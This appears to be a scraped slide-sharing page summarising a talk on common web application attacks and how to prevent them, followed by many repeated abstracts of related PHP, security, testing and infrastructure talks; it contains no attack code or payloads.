This document discusses common web application attacks and how to prevent them. It begins with an overview of SQL injection, the most prevalent attack, and how hackers can exploit unfiltered user input to access sensitive data or delete database records. The document then covers other injection attacks, session hijacking, cross-site scripting (XSS), cross-site request forgery (CSRF), clickjacking, and general best practices for securing code, servers, and authentication. Prevention methods include input validation, output escaping, prepared statements, CSRF tokens, and limiting access.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
When dynamic becomes static: the next step in web caching techniquesWim Godden
Although tools like Varnish can improve performance and scalability for static sites, when user-specific content is needed, a hit to the PHP/Ruby/Python/.Net backend is still required, causing scalability issues. We’ll look at a brand-new Nginx module which implements an ultra-fast and scalable solution to this problem, changing the way developers think about designing sites with user-specific content.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
When dynamic becomes static: the next step in web caching techniquesWim Godden
Although tools like Varnish can improve performance and scalability for static sites, when user-specific content is needed, a hit to the PHP/Ruby/Python/.Net backend is still required, causing scalability issues. We’ll look at a brand-new Nginx module which implements an ultra-fast and scalable solution to this problem, changing the way developers think about designing sites with user-specific content.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
From ReactPHP to Facebook Hack's Async implementation and many more, asynchronous programming has been a 'hot' topic lately. But how well does async programming support work in PHP and what can you actually use it for in your projects ? Let's look at some real-world use cases and how they leverage the power of async to do things you didn't know PHP could do.
Beyond PHP - it's not (just) about the codeWim Godden
Most PHP developers focus on writing code. But creating Web applications is about much more than just writing PHP. Take a step outside the PHP cocoon and into the big PHP ecosphere to find out how small code changes can make a world of difference on servers and network. This talk is an eye-opener for developers who spend over 80% of their time coding, debugging and testing.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
"The little big project. From zero to hero in two weeks with 3 front-end engi...Fwdays
It is believed that the front end is only one part of the job. We need a backend to store data, we need some DevOps. Oh, I also forgot about QA. There are legends about titans from the past who could single-handedly draw a design and launch a website.
But here's the real story: we has the Great Idea, it won't work without a back-end, there are only front-end developers in the team, outsourcing is possible only in design, the deadline is too near. Just smile and wave... Or we will can realised the project uses front-end technologies only, cut comlicated things, dive into devops. Spoiler: we did it, the Bobuk-Bacek formula works, JavaScript is power.
You will find out how I Love Front-end was launched, what was cut off by Occam's razor and why everyone hates the Mona Lisa.
Audience and level.
Full-stack developers and front-end developers who want to learn how to make back-end for front-end. Just curious guys. Level from junior to middle.
How to improve performance testing of your application? The best way is to include performance test into your CI pipeline! Based on the examples from GOG Store, let's check how to integrate Blackfire Player with Docker and Continuous Integration pipelines!
Everyone talks about raising the bar on quality of code, but it's always hard to start implementing it when you have no clue where to start. With this talk I'm shooing that there are many levels developers can improve themselves by using the right tools. In this talk I'll go over each tool with examples how to use them against your codebase. A must attend talk for every developer that wants to scale up their quality. Most PHP developers deploy code that does what the customer requested but they don't have a clue about the quality of the product they deliver. Without this knowledge, maintenance can be a hell and very expensive. In this workshop I cover unit testing, code measuring, performance testing, debugging and profiling and give tips and tricks how to continue after this workshop.
I put on my mink and wizard behat (tutorial)xsist10
An indepth dive into using Behat/Mink/Selenium for BDD testing.
* http://behat.org
* http://mink.behat.org/
* http://docs.seleniumhq.org/
In this talk I'll cover:
* why and when to use Behat (and when not)
* Installation and configuration of Behat and Mink
* Building Behat Contexts
* Avoiding data deadlocks and "test user account" syndrome
* Introduction to Selenium and testing JavaScript
* Best practises for writing tests (what to avoid, what to aspire for, writing stories like you mean it, how to get your product owners to write them)
* Common gotchas
Mugdha and Amish from OSSCube present on Php security at OSSCamp, organized by OSSCube - A Global open Source enterprise for Open Source Solutions
To know how we can help your business grow, leveraging Open Source, contact us:
India: +91 995 809 0987
USA: +1 919 791 5427
WEB: www.osscube.com
Mail: sales@osscube.com
Are you a good Code Scout
Scouts are taught to be adventurous, considerate, thoughtful, effective, diligent, ingenious, thorough, earnest and effective… All of these qualities are ones that we should be striving for as a Developer.
This talk intends to prove that being a Good Scout and being a Great developer are are pretty much the same thing. It will take you through the types of actions and attitudes that are taught to millions of kids aged seven to eighteen and compare it to what you should be practicing every day to make you a better Developer.
I'll tell you all the things you need to know to earn your very first Code Scout badge.
Diving into HHVM Extensions (PHPNW Conference 2015)James Titcumb
HHVM is currently gaining popularity at quite a pace, and it's a pretty exciting time for PHP runtimes. Have you ever wondered what is going on beneath this slick and super-speedy engine? I wondered that myself, so I dived into the internals of HHVM, discovering a treasure trove of awesome stuff. In this talk, I'll show you how HHVM itself works with a guided tour of the codebase, demonstrating how it all pieces together. I'll also show you a couple of ways to write your own incredible HHVM extension. You don't need to know C++ to understand this talk - just PHP language knowledge is enough.
From ReactPHP to Facebook Hack's Async implementation and many more, asynchronous programming has been a 'hot' topic lately. But how well does async programming support work in PHP and what can you actually use it for in your projects ? Let's look at some real-world use cases and how they leverage the power of async to do things you didn't know PHP could do.
Beyond PHP - it's not (just) about the codeWim Godden
Most PHP developers focus on writing code. But creating Web applications is about much more than just writing PHP. Take a step outside the PHP cocoon and into the big PHP ecosphere to find out how small code changes can make a world of difference on servers and network. This talk is an eye-opener for developers who spend over 80% of their time coding, debugging and testing.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
"The little big project. From zero to hero in two weeks with 3 front-end engi...Fwdays
It is believed that the front end is only one part of the job. We need a backend to store data, we need some DevOps. Oh, I also forgot about QA. There are legends about titans from the past who could single-handedly draw a design and launch a website.
But here's the real story: we has the Great Idea, it won't work without a back-end, there are only front-end developers in the team, outsourcing is possible only in design, the deadline is too near. Just smile and wave... Or we will can realised the project uses front-end technologies only, cut comlicated things, dive into devops. Spoiler: we did it, the Bobuk-Bacek formula works, JavaScript is power.
You will find out how I Love Front-end was launched, what was cut off by Occam's razor and why everyone hates the Mona Lisa.
Audience and level.
Full-stack developers and front-end developers who want to learn how to make back-end for front-end. Just curious guys. Level from junior to middle.
How to improve performance testing of your application? The best way is to include performance test into your CI pipeline! Based on the examples from GOG Store, let's check how to integrate Blackfire Player with Docker and Continuous Integration pipelines!
Everyone talks about raising the bar on quality of code, but it's always hard to start implementing it when you have no clue where to start. With this talk I'm shooing that there are many levels developers can improve themselves by using the right tools. In this talk I'll go over each tool with examples how to use them against your codebase. A must attend talk for every developer that wants to scale up their quality. Most PHP developers deploy code that does what the customer requested but they don't have a clue about the quality of the product they deliver. Without this knowledge, maintenance can be a hell and very expensive. In this workshop I cover unit testing, code measuring, performance testing, debugging and profiling and give tips and tricks how to continue after this workshop.
I put on my mink and wizard behat (tutorial)xsist10
An indepth dive into using Behat/Mink/Selenium for BDD testing.
* http://behat.org
* http://mink.behat.org/
* http://docs.seleniumhq.org/
In this talk I'll cover:
* why and when to use Behat (and when not)
* Installation and configuration of Behat and Mink
* Building Behat Contexts
* Avoiding data deadlocks and "test user account" syndrome
* Introduction to Selenium and testing JavaScript
* Best practises for writing tests (what to avoid, what to aspire for, writing stories like you mean it, how to get your product owners to write them)
* Common gotchas
Mugdha and Amish from OSSCube present on Php security at OSSCamp, organized by OSSCube - A Global open Source enterprise for Open Source Solutions
To know how we can help your business grow, leveraging Open Source, contact us:
India: +91 995 809 0987
USA: +1 919 791 5427
WEB: www.osscube.com
Mail: sales@osscube.com
Are you a good Code Scout
Scouts are taught to be adventurous, considerate, thoughtful, effective, diligent, ingenious, thorough, earnest and effective… All of these qualities are ones that we should be striving for as a Developer.
This talk intends to prove that being a Good Scout and being a Great developer are are pretty much the same thing. It will take you through the types of actions and attitudes that are taught to millions of kids aged seven to eighteen and compare it to what you should be practicing every day to make you a better Developer.
I'll tell you all the things you need to know to earn your very first Code Scout badge.
Diving into HHVM Extensions (PHPNW Conference 2015)James Titcumb
HHVM is currently gaining popularity at quite a pace, and it's a pretty exciting time for PHP runtimes. Have you ever wondered what is going on beneath this slick and super-speedy engine? I wondered that myself, so I dived into the internals of HHVM, discovering a treasure trove of awesome stuff. In this talk, I'll show you how HHVM itself works with a guided tour of the codebase, demonstrating how it all pieces together. I'll also show you a couple of ways to write your own incredible HHVM extension. You don't need to know C++ to understand this talk - just PHP language knowledge is enough.
After years of promoting PHPUnit I still hear it's hard to get started with unit testing. So instead of showing nice step-by-step examples on how to use PHPUnit, we're going to take an example straight from github. So I've taken the challenge to start writing tests for PHP projects that don't have unit tests in place and explain how I decide where to begin, how I approach my test strategy and how I ensure I’m covering each possible use-case (and covering the CRAP index). The goal of this presentation is to show everyone that even legacy code, spaghetti code and complex code bases can be tested. After this talk you can immediately apply my examples on your own codebase (even if it's a clean code base) and get started with testing. To follow along a basic knowledge unit testing with PHPUnit is required.
Composer has triggered a renaissance in the PHP community, it has changed the way we deal with other people’s code and it has changed the way we share our code. We are all slowly moving to using Composer, from Wordpress to Joomla and Drupal and frameworks in between. But many of us mistreat composer, follow outdated practices or simply lack a few tricks. In this session i’ll get you the low down on how to use composer the right way.
Developing software as part of a team introduces a host of challenges. A strong, motivated development team working together can marshal the strengths and specialities of each of its members to create something much larger than the sum of its parts. Teams that don’t work together can drain resources and make the workplace a miserable place to spend the day. The fact is, strong teams need strong leaders, and strong leadership is something that each of us can cultivate within ourselves. No matter your experience level or seniority, if you work as part of a team, you have the capacity to help lead your colleagues toward success. We’ll discuss strategies for dealing with conflict, ideas on how to become stronger communicators, and ways to help you and your teammates get the best from one another.
Secure Form Processing and Protection - Sunshine PHP 2015Joe Ferguson
This talk was given January 27th 2015 at MemphisPHP.org and February 6th at SunshinePHP 2015.
XSS, NONCE, CSRF, WTF?! Form processing is something that's very basic and easy to do...wrong. There are tools and technologies you need to be using to prevent your forms from being abused and data falling into the wrong hands. We'll explore several of these technologies and how to implement them into your applications to keep your data safe.
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)Chris Tankersley
One thing that most programmers do not take the time to understand is the servers that their application lives on. Most know a smattering of Apache configs, PHP configs, and basic information about the OS. This talk will deal with looking at tools that can help you quickly set up a server and how it can help you be a better developer. We'll look at tools like puppet for server management, OSSEC for log management, different command line tools, and nagios/monit for system monitoring.
This is not about how to code your API, but rather to show you what steps and best practices you need to utilize to build a successful, long-lived API. Thankfully with 5 Simple Steps you can build an API that is designed to last.
1 – Go in with a long-term mindset
2 – Understand what you’re building
3 – Utilize Spec Driven Development
4 – Incorporate Best Practices
5 – Repeat steps 1-4 for all new features
PhpSpec is a SpecBDD tool that enables you to use a TDD workflow that can transform the way you write PHP. In this session we will look at the TDD workflow and see how PhpSpec can be used to speed up your development; add regression safety, and improve your object-oriented design.
Thanks to tools like vagrant, puppet/chef, and Platform as a Service services like Heroku, developers are extremely used to being able to spin up a development environment that is the same every time. What if we could go a step further and make sure our development environment is not only using the same software, but 100% configured and set up like production. Docker will let us do that, and so much more. We'll look at what Docker is, why you should look into using it, and all of the features that developers can take advantage of.
Introduction to Continuous Integration with JenkinsEric Hogue
Talk on Continuous Integration given at Sunshine PHP 2015 on February 7.
Continuous Integration allows developers to run tests automatically every time code is pushed to source control. We will look at the different tests that a Continuous Integration server can run. How to create a build script so it runs the tests and make sure it produces the needed reports. Finally, how to set up Jenkins to run the build and display the reports.
Modelling by Example is a set of practices that combine BDD (Behaviour Driven Development) and DDD (Domain Driven Design) techniques to create a workflow that directly drives code from a starting point of user requirements. We will see how a simple feature can be defined via conversation with stakeholders, captured as automatable requirements, and expressed directly in the object model using tools such as Behat and PhpSpec.
Commands, events, queries - three types of messages that travel through your application. Some originate from the web, some from the command-line. Your application sends some of them to a database, or a message queue. What is the ideal infrastructure for an application to support this on-going stream of messages? What kind of architectural design fits best?
This talk provides answers to these questions: we take the *hexagonal* approach to software architecture. We look at messages, how they cross boundaries and how you can make steady communication lines between your application and other systems, like web browsers, terminals, databases and message queues.
You will learn how to separate the technical aspects of these connections from the core behavior of your application by implementing design patterns like the *command bus*, and design principles like *dependency inversion*.
We have ethical responsibilities when coding. We’re able to extract remarkably precise intuitions about an individual. But do we have a right to know what they didn’t consent to share, even when they willingly shared the data that leads us there? A major retailer’s data-driven marketing accidentially revealed to a teen’s family that she was pregnant. Eek.
What are our obligations to people who did not expect themselves to be so intimately known without sharing directly? How do we mitigate against unintended outcomes? For instance, an activity tracker carelessly revealed users’ sexual activity data to search engines. A social network’s algorithm accidentally triggered painful memories for grieving families who’d recently experienced death of their child and other loved ones.
We design software for humans. Balancing human needs and business specs can be tough. It’s crucial that we learn how to build in systematic empathy.
In this talk, we'll delve into specific examples of uncritical programming, and painful results from using insightful data in ways that were benignly intended. You’ll learn ways we can integrate practices for examining how our code might harm individuals. We’ll look at how to flip the paradigm, netting consequences that can be better for everyone.
SLIDES: http://www.slideshare.net/cczona/consequences-of-an-insightful-algorithm
VIDEO: http://confreaks.tv/videos/rubyconf2015-keynote-consequences-of-an-insightful-algorithm
REVIEWS: https://wakelet.com/wake/5758ef98-8e71-4854-9ea2-683e0b5c98a3
KEYNOTE: RubyConf, JSConfEU, PyConAU, GOTO Berlin, Lean Agile Scotland, CUSEC, Open Source Bridge
ADDITIONAL: ArrrrCamp, EuRuKo, DjangoCon, WDCNZ, SCNA
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
Building Modern and Secure PHP Applications – Codementor Office Hours with Be...Arc & Codementor
Codementor PHP expert mentor Ben Edmunds is the co-host of PHP Town Hall and author of Building Secure PHP Apps.
Ben is also the creator of Ion Auth, a simple, lightweight authentication library for CodeIgniter.
In an interactive format, Ben talked about:
Modern PHP
Latest PHP tools
SQL Injection
Password Hashing and Authentication
Other Common Hacks
https://www.codementor.io/benedmunds
https://www.codementor.io/php-tutorial/building-modern-secure-php-applications-codementor-office-hours-ben-edmunds
Have you ever extended legacy code? What is legacy code? How to work with legacy? During this talk I'd like to explain what's a legacy code, how to improve it, and show you how to progressively migrate your project to modern concepts.
Using php as a server-side scripting language, I have created a simple user authentication module. The module can be directly implemented in a website with some minor changes to provide user signup ability in a webpage. HTML and CSS have been used for the designing of the webpage, and MySQL for backend database management.
Beyond php - it's not (just) about the codeWim Godden
Most PHP developers focus on writing code. But creating Web applications is about much more than just wrting PHP. Take a step outside the PHP cocoon and into the big PHP ecosphere to find out how small code changes can make a world of difference on servers and network. This talk is an eye-opener for developers who spend over 80% of their time coding, debugging and testing.
Who would have thought putting 140 charachter messages about one's life online or having a virtual farm game could ever be popular ? Then again, many of us have those weird (but sometimes brilliant) ideas.
But no matter how incredible your ideas might be, getting them launched successfully takes more than writing lots of php code, smacking a sleek design on it and dropping it on a server.
So what does it take ? Where do most ideas crashland and how can you avoid making the same mistakes and transform your ideas into reality ? We'll look at what steps are needed to make a service successful and sustainable.
With PHP 8.0 recently released and PHP 5.x still accounting for over 40% of all production environments, it's time to paint a clear picture on not just why everyone should move to 8.x, but on how to get code ready for the latest version of PHP. In this talk, we'll look at some handy tools and techniques to ease the migration.
With PHP 7.2 recently released and PHP 5.3 and 5.4 still accounting for over 40% of all production environments, it's time to paint a clear picture on not just why everyone should move to 7.0 (or preferably 7.1), but on how to get code ready for the latest version of PHP.
Using the version compatibility checker for PHP_CodeSniffer and a few simple step-by-step instructions, upgrading old code to make it compatible with the latest PHP versions becomes actually really easy. In this talk, we'll migrate an old piece of code and get rid of the demons of the past and ready for the present and future.
The time of static or dynamically generated sites is long gone. Non-stop interaction with users is the new normal. However, polling with Ajax requests is processor intensive and cumbersome. Websockets allow you to interact with users in real-time without increasing system load. We'll go through the basics and see all the different options, illustrated with live examples of how and when to use it, as well as when not to use it.
Who would have thought putting 140 charachter messages about one's life online or having a virtual farm game could ever be popular ? Then again, many of us have those weird (but sometimes brilliant) ideas.
But no matter how incredible your ideas might be, getting them launched successfully takes more than writing lots of php code, smacking a sleek design on it and dropping it on a server.
So what does it take ? Where do most ideas crashland and how can you avoid making the same mistakes and transform your ideas into reality ? We'll look at what steps are needed to make a service successful and sustainable.
Your app lives on the network - networking for web developersWim Godden
Our job might be to build web applications, but we can't build apps that rely on networking if we don't know how these networks and the big network that connects them all (this thing called the Internet) actually work.
I'll walk through the basics of networking, then dive a lot deeper (from TCP/UDP to IPv4/6, source/destination ports, sockets, DNS and even BGP).
Prepare for an eye-opener when you realize how much a typical app relies on all of these (and many more) working flawlessly... and how you can prepare your app for failure in the chain.
With PHP 7.2 recently released and PHP 5.3 and 5.4 still accounting for over 40% of all production environments, it's time to paint a clear picture on not just why everyone should move to 7.0 (or preferably 7.1), but on how to get code ready for the latest version of PHP.
Using the version compatibility checker for PHP_CodeSniffer and a few simple step-by-step instructions, upgrading old code to make it compatible with the latest PHP versions becomes actually really easy. In this talk, we'll migrate an old piece of code and get rid of the demons of the past and ready for the present and future.
With PHP 7.2 recently released and PHP 5.3 and 5.4 still accounting for over 40% of all production environments, it's time to paint a clear picture on not just why everyone should move to 7.0 (or preferably 7.1), but on how to get code ready for the latest version of PHP.
Using the version compatibility checker for PHP_CodeSniffer and a few simple step-by-step instructions, upgrading old code to make it compatible with the latest PHP versions becomes actually really easy. In this talk, we'll migrate an old piece of code and get rid of the demons of the past and ready for the present and future.
Beyond php - it's not (just) about the codeWim Godden
Most PHP developers focus on writing code. But creating Web applications is about much more than just wrting PHP. Take a step outside the PHP cocoon and into the big PHP ecosphere to find out how small code changes can make a world of difference on servers and network. This talk is an eye-opener for developers who spend over 80% of their time coding, debugging and testing.
The time of static or dynamically generated sites is long gone. Non-stop interaction with users is the new normal. However, polling with Ajax requests is processor intensive and cumbersome. Websockets allow you to interact with users in real-time without increasing system load. We'll go through the basics and see all the different options, illustrated with live examples of how and when to use it.
Your app lives on the network - networking for web developersWim Godden
Our job might be to build web applications, but we can't build apps that rely on networking if we don't know how these networks and the big network that connects them all (this thing called the Internet) actually work.
I'll walk through the basics of networking, then dive a lot deeper (from TCP/UDP to IPv4/6, source/destination ports, sockets, DNS and even BGP).
Prepare for an eye-opener when you realize how much a typical app relies on all of these (and many more) working flawlessly... and how you can prepare your app for failure in the chain.
A practical step-by-step guide to Git, taking you through each phase of a project and explaining the use of Git at each step of the development process. Expect lots of how-to, but also some how-not-to, to avoid going down the wrong path.
Beyond php - it's not (just) about the codeWim Godden
Most PHP developers focus on writing code. But creating Web applications is about much more than just wrting PHP. Take a step outside the PHP cocoon and into the big PHP ecosphere to find out how small code changes can make a world of difference on servers and network. This talk is an eye-opener for developers who spend over 80% of their time coding, debugging and testing.
From ReactPHP to Facebook Hack's Async implementation and many more, asynchronous programming has been a 'hot' topic lately. But how well does async programming support work in PHP and what can you actually use it for in your projects ? Let's look at some real-world use cases and how they leverage the power of async to do things you didn't know PHP could do.
Although tools like Varnish can improve performance and scalability for static sites, when user-specific content is needed, a hit to the PHP/Ruby/Python/.Net backend is still required, causing scalability issues. We’ll look at a brand-new Nginx module which implements an ultra-fast and scalable solution to this problem, changing the way developers think about designing sites with user-specific content.
From ReactPHP to Facebook Hack's Async implementation and many more, asynchronous programming has been a 'hot' topic lately. But how well does async programming support work in PHP and what can you actually use it for in your projects ? Let's look at some real-world use cases and how they leverage the power of async to do things you didn't know PHP could do.
Although tools like Varnish can improve performance and scalability for static sites, when user-specific content is needed, a hit to the PHP/Ruby/Python/.Net backend is still required, causing scalability issues. We’ll look at a brand-new Nginx module which implements an ultra-fast and scalable solution to this problem, changing the way developers think about designing sites with user-specific content.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
